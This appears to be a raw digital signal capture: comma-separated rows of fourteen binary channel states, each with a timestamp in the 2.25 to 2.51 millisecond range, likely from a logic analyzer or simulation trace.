1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2499120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2499360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2499640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2499880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2500120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2500360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2500600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2500840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2501120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2501360e-03 1,0,0,0,0,1,0,0,0,1,0,0,0,0,2.2501640e-03 1,0,0,0,0,1,0,0,0,1,0,0,0,1,2.3740840e-03 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.3742760e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3743000e-03 0,1,0,0,0,1,0,0,0,1,0,1,0,1,2.3743200e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3743440e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3746400e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3746600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3746840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3747080e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3747320e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3747600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3747840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3748120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3748360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3748600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3749080e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3749160e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3749320e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3749400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3749600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3749840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3749880e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3750360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3750600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3750840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3751080e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3751320e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3751600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3751840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3752120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3752360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3752600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3752840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3753080e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3753160e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3753320e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3753600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3754120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3754360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3754400e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3754600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3754840e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3755080e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3755320e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3755600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3755840e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3756120e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3756360e-03 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3756400e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3756440e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3756840e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3757080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3757320e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3757600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3757640e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3757840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3758120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3758360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3758600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3758840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3759080e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3759320e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3759600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3759840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3760120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3760600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3760840e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3760920e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3761080e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3761320e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3761600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3761840e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3762120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3762360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3762600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3762840e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3763080e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3763400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3763640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3763840e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3764120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3764360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3764600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3764840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3764920e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3765080e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3765400e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3765880e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3766120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3766360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3766600e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3766840e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3767080e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3767360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3767640e-03 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3767680e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3767720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3768120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3768360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3768600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3768840e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3769080e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3769400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3769640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3769880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3770120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3770360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3770880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3771080e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3771160e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3771640e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3771880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3771960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3772120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3772360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3772600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3772880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3773080e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3773400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3773640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3773880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3774120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3774360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3774600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3774880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3775120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3775400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3775640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3775880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3776120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3776360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3776600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3776880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3777120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3777400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3777640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3777880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3778120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3778360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3778600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3778880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3779120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3779400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3779640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3779880e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3779920e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3780360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3780600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3780680e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3780880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3781120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3781360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3781640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3781880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3782120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3782360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3782600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3782880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3783120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3783400e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3783640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3783880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3784120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3784360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3784600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3784680e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3784880e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3785120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3785640e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3785880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3785960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3786120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3786360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3786600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3786880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3787120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3787400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3787640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3787880e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3787920e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3788120e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3788360e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3788600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3788880e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3789400e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3789640e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3789880e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3790120e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3790360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3790600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3790680e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3790880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3791120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3791360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3791640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3791880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3792120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3792360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3792600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3792840e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3793120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3793400e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3793640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3793880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3794120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3794360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3794600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3794680e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3795120e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3795400e-03 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3795440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3795480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3795640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3795880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3796120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3796360e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3796600e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3796880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3797120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3797400e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3797640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3797880e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3798120e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3798360e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3798440e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3798600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3798880e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3799080e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3799400e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3799640e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3799880e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3800120e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3800360e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3800600e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3800880e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3801400e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3801640e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3801720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3801880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3802120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3802360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3802600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3802880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3803080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3803360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3803640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3803880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3804120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3804360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3804600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3804840e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3805080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3805360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3805640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3805880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3806120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3806360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3806600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3806880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3807080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3807360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3807640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3807880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3808120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3808360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3808600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3808880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3809080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3809360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3809640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3809880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3810120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3810360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3810600e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3810880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3811080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3811400e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3811640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3811880e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3812120e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3812360e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3812640e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3812920e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3813160e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3813400e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3813680e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5059880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5062240e-03 1,1,0,0,0,0,0,0,0,0,0,1,0,1,2.5062520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5062800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.5065640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5065880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.5066120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5066360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.5066600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5066880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.5067120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5067400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.5067880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5068120e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,1,2.5068200e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,1,2.5068360e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,1,2.5068600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.5068680e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5068840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5068880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5069120e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5069160e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5069640e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5069880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5069960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5070120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5070360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5070600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5070880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5071120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5071400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5071640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5071880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5072120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5072360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5072600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5072880e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5072920e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5073400e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5073640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5073720e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5073880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5074120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5074360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5074600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5074880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5075120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5075400e-03 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.5075640e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5075680e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5075880e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5076120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5076200e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5076360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5076600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5076880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5077080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5077400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5077640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5077880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5078120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5078360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5078600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5079080e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5079400e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5079640e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5079880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5079960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5080120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5080360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5080600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5080840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5081080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5081400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5081640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5081840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5082120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5082360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5082600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5082840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5083080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5083320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5083640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5083840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5084120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5084360e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5084400e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5084840e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5085080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5085160e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5085360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5085640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5085880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5086120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5086360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5086600e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5086640e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5087080e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5087360e-03 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.5087400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5087440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5087640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5087840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5088120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5088360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5088600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5088840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5089360e-03 